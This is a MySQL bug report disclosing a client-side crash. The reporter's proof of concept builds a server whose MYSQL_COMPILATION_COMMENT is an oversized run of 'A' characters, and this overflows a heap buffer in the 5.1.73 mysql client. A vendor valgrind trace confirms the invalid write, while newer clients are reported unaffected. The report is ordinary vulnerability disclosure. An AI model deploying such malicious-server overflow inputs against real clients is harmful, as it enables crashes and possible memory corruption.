Bug #77046 the Vulnerability in mysql client 5.x (windows)
Submitted: 15 May 2015 6:14 Modified: 30 Dec 2015 11:38
Reporter: doggy doggy Email Updates:
Status: Can't repeat Impact on me:
None 
Category:MySQL Server: Compiling Severity:S3 (Non-critical)
Version:5.x OS:Windows (windows7 x84)
Assigned to: CPU Architecture:Any

[15 May 2015 6:14] doggy doggy 
Description:
Hello,
 Here, I found a vulnerability in mysql client.
 I edited the source code of mysqld.Here is the POC.

file: mysql-5.1.73\include\mysql_version.h

/* Copyright (c) 1996, 1999-2004, 2007 MySQL AB
   This file is public domain and comes with NO WARRANTY of any kind */
 
/* Version numbers for protocol & mysqld */
 
#ifndef _mysql_version_h
#define _mysql_version_h
#ifdef _CUSTOMCONFIG_
#include <custom_conf.h>
#else
#define PROTOCOL_VERSION	10
#define MYSQL_SERVER_VERSION	"55.1.73"
#define MYSQL_BASE_VERSION	"mysqld-55.1"
#define MYSQL_SERVER_SUFFIX_DEF	"-pro"
#define FRM_VER	6
#define MYSQL_VERSION_ID	50173
#define MYSQL_PORT	3306
#define MYSQL_PORT_DEFAULT	0
#define MYSQL_UNIX_ADDR	"MySQL"
#define MYSQL_CONFIG_NAME	"my"
#define MYSQL_COMPILATION_COMMENT	"Source distributionAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 
/* mysqld compile time options */
#endif /* _CUSTOMCONFIG_ */
 
#ifndef LICENSE
#define LICENSE	GPL
#endif /* LICENSE */
 
#endif /* _mysql_version_h */

And recompiled.Then I used mysql client to connect the server, and I found it crashed.

How to repeat:
By recompiling the mysql server,and using mysql client to connect it.
[4 Sep 2015 8:39] MySQL Verification Team 
Hello!

Thank you for the report.
I'm not seeing this issue with 5.5/5.6 builds.
Could you please confirm from your end with 5.5/5.6? If you can provide more information, feel free to add it to this bug and change the status back to 'Open'.

Thank you for your interest in MySQL.

Thanks,
Umesh
[30 Dec 2015 15:55] MySQL Verification Team 
5.5, 5.6, 5.7, 5.8 clients weren't affected.
5.1.73 client encountered this:

[q@q mysql-5.1.73-linux-x86_64-glibc23]$ valgrind --db-attach=yes ./bin/mysql -uroot
==24513==
==24513== Warning: --db-attach is a deprecated feature which will be
==24513==    removed in the next release. Use --vgdb-error=1 instead
==24513==
==24513== Memcheck, a memory error detector
==24513== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==24513== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==24513== Command: ./bin/mysql -uroot -h192.168.1.1
==24513==
Welcome to the MySQL monitor.  Commands end with ; or \g.
==24513== Invalid write of size 1
==24513==    at 0x4C3075C: __GI_mempcpy (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==24513==    by 0x5A53548: _IO_default_xsputn (genops.c:464)
==24513==    by 0x5A22A4C: vfprintf (vfprintf.c:1635)
==24513==    by 0x5A4897A: vsprintf (iovsprintf.c:42)
==24513==    by 0x5A2BD46: sprintf (sprintf.c:32)
==24513==    by 0x4441D0: main (mysql.cc:1172)
==24513==  Address 0x63cba78 is 0 bytes after a block of size 520 alloc'd
==24513==    at 0x4C29BFD: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==24513==    by 0x471B41: my_malloc (my_malloc.c:37)
==24513==    by 0x44535B: String::realloc(unsigned int) (sql_string.cc:79)
==24513==    by 0x4440F6: main (mysql.cc:1148)
==24513==

Let us know if you can repeat the problem using 5.5 or newer client.